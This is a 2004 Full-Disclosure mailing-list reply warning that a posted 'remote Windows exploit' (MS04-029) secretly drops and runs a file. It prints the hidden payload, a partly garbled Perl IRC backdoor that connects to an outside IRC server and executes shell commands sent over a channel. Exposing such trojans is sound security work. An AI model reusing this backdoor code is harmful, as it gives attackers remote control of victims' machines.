[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
- From: Deigo Dude <deigodude@xxxxxxx>
- Date: Wed, 03 Nov 2004 16:54:48 -0500
>>Do i need too say more :D
You sure do, like for example, explain the following in your code and
why it makes /tmp/hi (/var/tmp/hi) and then executes it and it contains
this code
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use
ket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock
"USER k +i
k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last
if $mode=
="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
t $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";while(<$sock>){if (/^PING
t $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w
]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG
$chan :$
_\n";sleep 1;}}}#/tmp/hi
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html